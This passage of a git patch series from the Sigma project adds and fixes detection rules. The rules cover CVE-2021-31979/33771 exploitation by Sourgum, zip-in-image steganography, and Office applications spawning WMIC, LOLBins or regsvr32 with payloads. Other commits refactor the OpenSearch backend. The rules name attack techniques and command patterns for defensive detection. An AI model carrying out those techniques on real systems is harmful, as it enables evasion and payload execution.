CommandLine + - TargetObject + - Details +logsource: + product: windows + category: registry_event +detection: + selection: + TargetObject|contains: 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\' + Details|re: '.*(.sh|.exe|.dll|.bin|.bat|.cmd|.js|.ps|.vb|.jar|.hta|.msi|.vbs)$' + condition: selection +falsepositives: + - none +level: high \ No newline at end of file diff --git a/rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml new file mode 100644 index 00000000..1126237c --- /dev/null +++ b/rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml @@ -0,0 +1,31 @@ +title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum +id: 32b5db62-cb5f-4266-9639-0fa48376ac00 +status: experimental +description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum +author: Sittikorn S +date: 2021/07/16 +modified: 2021/09/09 +references: + - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ + - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ + - https://nvd.nist.gov/vuln/detail/cve-2021-33771 + - https://nvd.nist.gov/vuln/detail/cve-2021-31979 +tags: + - attack.credential_access + - attack.t1566 + - attack.t1203 + # - threat_group.Sourgum +logsource: + product: windows + category: registry_event +detection: + selection: + TargetObject|contains: + - '\Software\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32' + - '\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32' + keywords: + - IMJPUEXP.DLL + condition: selection and keywords +falsepositives: + - Unlikely +level: critical \ No newline at end of file From 41458d8a5aad886def9a575830aebe3e3430105d Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Thu, 9 Sep 2021 16:13:27 +0200 Subject: [PATCH 0812/1367] New Rule - Linux Auditd Hidden Files - Steganography --- .../lnx_auditd_hidden_files_steganography.yml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml new file mode 100644 index 00000000..ec2ec72c --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml @@ -0,0 +1,39 @@ +title: Obfuscated Files or Information - Steganography +id: 45810b50-7edc-42ca-813b-bdac02fb946b +description: Detects appending of zip file to image +author: 'Pawel Mazur' +status: experimental +date: 2021/09/09 +references: + - https://attack.mitre.org/techniques/T1027/003/ +tags: + - attack.defense_evasion + - attack.t1027.003 +falsepositives: + - None +level: low +logsource: + product: linux + service: auditd +detection: + commands: + type: EXECVE + a0: + - cat + a1: + - a1|endswith: '.jpg' + - a1|endswith: '.png' + a2: + - a2|endswith: '.zip' + condition: commands and a1 and a2 +--- +id: edd595d7-7895-4fa7-acb3-85a18a8772ca +detection: + commands: + type: EXECVE + a0: + - unzip + a1: + - a1|endswith: '.jpg' + - a1|endswith: '.png' + condition: commands and a1 \ No newline at end of file From 0971fe1d493044d0bf57677d400ec14986ec6526 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Thu, 9 Sep 2021 16:27:57 +0200 Subject: [PATCH 0813/1367] Update lnx_auditd_hidden_files_steganography.yml Fixing the listing issue --- .../auditd/lnx_auditd_hidden_files_steganography.yml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml index ec2ec72c..1e21a820 100644 --- a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml @@ -18,22 +18,20 @@ logsource: detection: commands: type: EXECVE - a0: - - cat + a0: cat a1: - a1|endswith: '.jpg' - a1|endswith: '.png' a2: - - a2|endswith: '.zip' + a2|endswith: '.zip' condition: commands and a1 and a2 --- id: edd595d7-7895-4fa7-acb3-85a18a8772ca detection: commands: type: EXECVE - a0: - - unzip + a0: unzip a1: - a1|endswith: '.jpg' - a1|endswith: '.png' - condition: commands and a1 \ No newline at end of file + condition: commands and a1 From 62db796fc2d470d509c6def41802dd6ef3e51cbe Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Thu, 9 Sep 2021 16:46:41 +0200 Subject: [PATCH 0814/1367] Update lnx_auditd_hidden_files_steganography.yml Formatting changes --- rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml index 1e21a820..c7719df7 100644 --- a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml @@ -1,5 +1,4 @@ title: Obfuscated Files or Information - Steganography -id: 45810b50-7edc-42ca-813b-bdac02fb946b description: Detects appending of zip file to image author: 'Pawel Mazur' status: experimental @@ -15,6 +14,8 @@ level: low logsource: product: linux service: auditd +--- +id: 45810b50-7edc-42ca-813b-bdac02fb946b detection: commands: type: EXECVE From 458973af81a6ab3f1c29c4b14d9778bbfc437383 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Thu, 9 Sep 2021 16:52:58 +0200 Subject: [PATCH 0815/1367] Update lnx_auditd_hidden_files_steganography.yml Adding missing field: action --- rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml index c7719df7..ec9ddaba 100644 --- a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml @@ -1,3 +1,4 @@ +action: global title: Obfuscated Files or Information - Steganography description: Detects appending of zip file to image author: 'Pawel Mazur' From c2c1b21a27b9d2f444fd1c5d151280d4f1b03396 Mon Sep 17 00:00:00 2001 From: Young Date: Thu, 9 Sep 2021 10:40:48 -0700 Subject: [PATCH 0816/1367] cleaning up changed files --- .DS_Store | Bin 8196 -> 0 bytes tools/.DS_Store | Bin 6148 -> 0 bytes tools/sigma/backends/base.py | 3 +++ 3 files changed, 3 insertions(+) delete mode 100644 .DS_Store delete mode 100644 tools/.DS_Store diff --git a/.DS_Store b/.DS_Store deleted file mode 100644 index b4c524a393c6a725f38a82ba14af4978c2a95449..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8196 zcmeHM-A)rh6g~qKN4i&y%cnGtrk?TrS-I47Aov%BASX7-!2yPYW!iCn9)L^MxCNfh?8Q>X?Q zU+2?}8G1clpXsXal458?_ZZRA_ zt9?&-MJJ)?By`V0uTX^S9Xw0INo18bwNbz*(60cm-KS`u%H)$5S--nmu3xrY-v)vo zsyisD@6ymBnxh;&q5{s}r!Cr{yNI$$_i)VZ0u`|jP@_sL%I8>==?G_=9)df7CvL`g zGsAdbzobmGSMff^p3wIjPy;&_b`1S3h8_o|MkVZQRH+%ojvU6YH)tDbY~ucRpg;km z$%7T3lu91mBbSyDGkz~7+d|o{A+r^+1w3@k6<0&8QmVzT&xA%PCJ#Cll z$4<4qKYMl4_kxn+RU4A*RH}eHd*XN%zn$}2UZpAH6xD@Ew*A@pPG>!nUa;2E%iRU5 zv%&3^jZC*YnY?~$>Gsw^?c`18ZTH;=+&E0=ZvxGz#n4n$A zSsyH_OqsA$(@``g&V|fnI*v)q$rI*H>W3tcN#u0sdn9BEg&7GXrB07%Y)%YuIg}Vz z&XBYSj)#P5;g0GUSwkk>fX6QqVGa!5vg7n#M7u20hL2K+@ESF5<;7kFoJNr-3E5W@ zb?otA75k7rM(6e+q1!Oz1xwA$%Ep4Vy1sgrn#*gyn3@5kkYdDA6FFqeC~(dSjH>wa zy#6l?-~T`7QJC;X0i(d*R6va7i}@Tz@bh<6d@#J$wondG*cjJSUQ$rWDh+ jVTiT`D08yf_msyO*dN~r*!$g|rsn%EC(cy=v;sc>_Ajar diff --git a/tools/.DS_Store b/tools/.DS_Store deleted file mode 100644 index fa101c297bef89862d774ae6787552022aabef46..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKT`vPc6g@*pmC(eC7s>vDCj5d$OC-Lc-ivKDqSZ#X32*!EKllrNpC`_pnJ_bp zM-k>GbI~qw%UumtMyK_OXK&j?kuW@O}>`^bO>=NAA4; z!ha6(RNjh=k=f17pja>SO#3n9SRZgGb#?K%zn#UVbs|m(FN4oGhb%$g072bgP z?udEV)l5I=%FWrKdQ-B3UxNG|y`1w-&Mc^ps(G<OLo Date: Thu, 9 Sep 2021 10:55:36 -0700 Subject: [PATCH 0817/1367] reverted changes in base.py to upstream --- tools/sigma/backends/base.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py index 12ffb90a..469c0648 100644 --- a/tools/sigma/backends/base.py +++ b/tools/sigma/backends/base.py @@ -65,7 +65,7 @@ class BackendOptions(dict): def _load_config_file(self, path): """ Populates options from a configuration file - + :param path: Path to the configuration file """ if path is None: @@ -337,4 +337,4 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): in addition to the field mapping defined in the conversion configuration. The field name passed to this method was already transformed from the original name given in the Sigma rule. """ - return fieldname \ No newline at end of file + return fieldname From ffbeec134dcd321efd3e5bbeb19867f865ad26b6 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 9 Sep 2021 19:56:20 +0200 Subject: [PATCH 0818/1367] Update image_load_wmiprvse_wbemcomn_dll_hijack.yml --- .../image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml b/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml index 1b117e85..5eeb2e83 100644 --- a/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml +++ b/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml @@ -3,7 +3,7 @@ id: 7707a579-e0d8-4886-a853-ce47e4575aaa description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. status: experimental date: 2020/10/12 -modified: 2021/06/10 +modified: 2021/09/09 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.execution From 3fbe5478c3d4d63f19e7831bfb130ee2b1d75374 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Thu, 9 Sep 2021 20:34:20 +0200 Subject: [PATCH 0819/1367] Update and rename lnx_auditd_hidden_files_steganography.yml to lnx_auditd_hidden_zip_files_steganography.yml Splitting the rule into separate rules --- ...x_auditd_hidden_zip_files_steganography.yml} | 17 +++-------------- 1 file changed, 3 insertions(+), 14 deletions(-) rename rules/linux/auditd/{lnx_auditd_hidden_files_steganography.yml => lnx_auditd_hidden_zip_files_steganography.yml} (66%) diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml b/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml similarity index 66% rename from rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml rename to rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml index ec9ddaba..77836ffd 100644 --- a/rules/linux/auditd/lnx_auditd_hidden_files_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml @@ -1,11 +1,12 @@ -action: global -title: Obfuscated Files or Information - Steganography +title: Steganography Hide Zip Information in Picture File +id: 45810b50-7edc-42ca-813b-bdac02fb946b description: Detects appending of zip file to image author: 'Pawel Mazur' status: experimental date: 2021/09/09 references: - https://attack.mitre.org/techniques/T1027/003/ + - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ tags: - attack.defense_evasion - attack.t1027.003 @@ -15,8 +16,6 @@ level: low logsource: product: linux service: auditd ---- -id: 45810b50-7edc-42ca-813b-bdac02fb946b detection: commands: type: EXECVE @@ -27,13 +26,3 @@ detection: a2: a2|endswith: '.zip' condition: commands and a1 and a2 ---- -id: edd595d7-7895-4fa7-acb3-85a18a8772ca -detection: - commands: - type: EXECVE - a0: unzip - a1: - - a1|endswith: '.jpg' - - a1|endswith: '.png' - condition: commands and a1 From 5a5769cce63519e5371c31e987a74a81ddf534c9 Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Thu, 9 Sep 2021 20:38:25 +0200 Subject: [PATCH 0820/1367] New Rule - Linux - Steganography Unzip Hidden Information From Picture File --- ...d_unzip_hidden_zip_files_steganography.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml diff --git a/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml b/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml new file mode 100644 index 00000000..de87660b --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml @@ -0,0 +1,27 @@ +title: Steganography Unzip Hidden Information From Picture File +id: edd595d7-7895-4fa7-acb3-85a18a8772ca +description: Detects extracting of zip file from image file +author: 'Pawel Mazur' +status: experimental +date: 2021/09/09 +references: + - https://attack.mitre.org/techniques/T1027/003/ + - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ +tags: + - attack.defense_evasion + - attack.t1027.003 +falsepositives: + - None +level: low +logsource: + product: linux + service: auditd +detection: + commands: + type: EXECVE + a0: + - unzip + a1: + - a1|endswith: '.jpg' + - a1|endswith: '.png' + condition: commands and a1 \ No newline at end of file From fe53f6dd5d46a72da8e5f40141200e926dcfc250 Mon Sep 17 00:00:00 2001 From: Young Date: Thu, 9 Sep 2021 15:02:59 -0700 Subject: [PATCH 0821/1367] moved default values to backend file --- .../sigma/backends/defaultOpensearchValues.py | 10 ------ tools/sigma/backends/opensearch.py | 33 ++++++++++++------- 2 files changed, 22 insertions(+), 21 deletions(-) delete mode 100644 tools/sigma/backends/defaultOpensearchValues.py diff --git a/tools/sigma/backends/defaultOpensearchValues.py b/tools/sigma/backends/defaultOpensearchValues.py deleted file mode 100644 index 87f0a582..00000000 --- a/tools/sigma/backends/defaultOpensearchValues.py +++ /dev/null @@ -1,10 +0,0 @@ -RULE_TYPE = "monitor" -IS_ENABLED = True -INTERVAL = 5 -UNIT = "MINUTES" -TRIGGER_NAME = "generated-trigger" -SEVERITIES = {"informational": "5", "low": "4", "medium": "3", "high": "2", "critical": "1"} -TRIGGER_SCRIPT = "ctx.results[0].hits.total.value > 0" -TRIGGER_LANGUAGE = "painless" -MONITOR_INDICES = ["opensearch-security-logs"] -NUM_RESULTS = 1 \ No newline at end of file diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index a2b951cb..afc0fe44 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py @@ -24,7 +24,6 @@ from uuid import uuid4 from sigma.parser.condition import SigmaAggregationParser from .elasticsearch import ElasticsearchQuerystringBackend -from .defaultOpensearchValues import * class Atom: def __init__(self, field: str, prop: str) -> None: @@ -274,6 +273,18 @@ class OpenSearchBackend(object): ) isThreshold = False + # Default values for fields exclusive to OpenSearch monitors + RULE_TYPE = "monitor" + IS_ENABLED = True + INTERVAL = 5 + UNIT = "MINUTES" + TRIGGER_NAME = "generated-trigger" + SEVERITIES = {"informational": "5", "low": "4", "medium": "3", "high": "2", "critical": "1"} + TRIGGER_SCRIPT = "ctx.results[0].hits.total.value > 0" + TRIGGER_LANGUAGE = "painless" + MONITOR_INDICES = ["opensearch-security-logs"] + NUM_RESULTS = 1 + def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.tactics = self._load_mitre_file("tactics") @@ -363,17 +374,17 @@ class OpenSearchBackend(object): ''' def map_severity(self, severity): severity = severity.lower() - return SEVERITIES[severity] if severity in SEVERITIES else SEVERITIES["medium"] + return self.SEVERITIES[severity] if severity in self.SEVERITIES else self.SEVERITIES["medium"] def create_trigger(self, severity): return [ { - "name": TRIGGER_NAME, + "name": self.TRIGGER_NAME, "severity": self.map_severity(severity), "condition": { "script": { - "source": f'{TRIGGER_SCRIPT}', - "lang": TRIGGER_LANGUAGE + "source": f'{self.TRIGGER_SCRIPT}', + "lang": self.TRIGGER_LANGUAGE } }, "actions": [] @@ -419,9 +430,9 @@ class OpenSearchBackend(object): return [ { "search": { - "indices": MONITOR_INDICES, + "indices": self.MONITOR_INDICES, "query": { - "size": NUM_RESULTS, + "size": self.NUM_RESULTS, "aggregations": {}, "query": self.build_query(translation) } @@ -550,14 +561,14 @@ class OpenSearchBackend(object): references = self.get_references(configs) rule = { - "type": RULE_TYPE, + "type": self.RULE_TYPE, "name": rule_name, "description": rule_description, - "enabled": IS_ENABLED, + "enabled": self.IS_ENABLED, "schedule": { "period": { - "interval": INTERVAL, - "unit": UNIT + "interval": self.INTERVAL, + "unit": self.UNIT } }, "inputs": inputs, From 5470c40ca6749c5ef4fd4497778a0382973ee148 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 20:56:11 -0600 Subject: [PATCH 0822/1367] Resolving Comment selection2: ParentImage: removed - since there is only one attribute. --- .../Monitor_Office_Applications_Spawning_WMI_command-line.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index f8410024..65dc6850 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml @@ -21,7 +21,7 @@ detection: - Image|endswith: '\wbem\WMIC.exe' - ProcessCommandLine|contains: 'wmic ' selection2: - - ParentImage: + ParentImage: - winword.exe - excel.exe - powerpnt.exe From ff08de6d201a493916e9e30314df437189a32b7c Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:02:11 -0600 Subject: [PATCH 0823/1367] Completed Changes based on review selection2: ParentPrcessName|endswith: --- .../sysmon/Office_Applications_Spawning_WMI_command-line.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml index 19f87e10..8fea8200 100644 --- a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml @@ -23,7 +23,7 @@ detection: - OriginalFileName: 'wmic.exe' - Description: 'WMI Commandline Utility' selection2: - - ParentPrcessName|endswith: + ParentPrcessName|endswith: - winword.exe - excel.exe - powerpnt.exe From 918bcfbf8aff74203c208c052af89d6d68a6ef2c Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:04:09 -0600 Subject: [PATCH 0824/1367] Completed requested changes selection2: Image|endswith: --- ..._Process Create_command_execution_by_Office_Applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml index d61ba1b6..d459f816 100644 --- a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml +++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml @@ -22,7 +22,7 @@ detection: EventType: WMIExecution WMIcommand|contains: 'Win32_Process\:\:Create' selection2: - - Image|endswith: + Image|endswith: - '\winword.exe' - '\excel.exe' - '\powerpnt.exe' From d3b4a6aa7a31f07dbf70a0a1d200da5233fa0767 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:09:24 -0600 Subject: [PATCH 0825/1367] Changed title based on comments title: File Creation by Office Applications --- ...es_creation_by_Office_applications_using_file_extentions.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index d56f39e3..032643c0 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,4 +1,4 @@ -title: Executable and Files creation by Office Applications +title: File Creation by Office Applications description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From cfe11cdf1783829c76dc303a40416de65977c79a Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:13:02 -0600 Subject: [PATCH 0826/1367] Resolved more issues from last commit as per commetns Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...tor_LOLBins_Process_Creations_by_Office_applications.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 84e82010..acc32c73 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,5 +1,5 @@ title: Created Executables and Files by Office Applications -id: a9505d16-644f-4f24-9002-7c322675e40d +id: c64ee10c-11e4-11ec-82a8-0242ac130003 description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -10,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: process_creation From 1102def1bf9e0f9eee9dc499d2eb9aa6d03d0617 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:14:08 -0600 Subject: [PATCH 0827/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...LBins_process_creations_with_Wmiprvse_parent_process.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 4858fc09..13fdecd3 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -1,5 +1,5 @@ title: Lolbins Process Creation with WmiPrvse -id: 0f33c4f0-5ac8-4462-a94a-e25d696ff5bf +id: 0d61a48a-11e5-11ec-82a8-0242ac130003 description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -10,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: process_creation From 2be4c699fcc696e03f191f72e74a199dd772fce4 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:16:38 -0600 Subject: [PATCH 0828/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...pplication_from_proxy executing_regsvr32_with_payload.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml index 7b25e621..8e7f40b4 100644 --- a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml @@ -1,4 +1,5 @@ title: Excel Proxy Executing Regsvr32 With Payload +id: 5c2290fc-11e5-11ec-82a8-0242ac130003 description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: process_creation From 250a3074142e2967f5676fdf356a4710ec7f50b1 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:17:38 -0600 Subject: [PATCH 0829/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...Monitor_Office_Applications_Spawning_WMI_command-line.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index 65dc6850..9172188b 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml @@ -1,4 +1,5 @@ title: Office Applications Spawning Wmi Cli +id: 91d104c2-11e5-11ec-82a8-0242ac130003 description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: windows category: process_creation From 3f71f7466dbf8807bbd3149769f24f42fe46e9aa Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:19:17 -0600 Subject: [PATCH 0830/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...ocess Create_command_execution_by_Office_Applications.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml index d459f816..9ef408ef 100644 --- a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml +++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml @@ -1,4 +1,5 @@ title: WMI Command Execution by Office Applications +id: caec93f2-11e5-11ec-82a8-0242ac130003 description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: EndPoint Detection Logs category: process_creation From e64bb1783ecbdf1897d806b0211d43d5147779b9 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:20:16 -0600 Subject: [PATCH 0831/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...creation_by_Office_applications_using_file_extentions.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 032643c0..5775a21e 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ 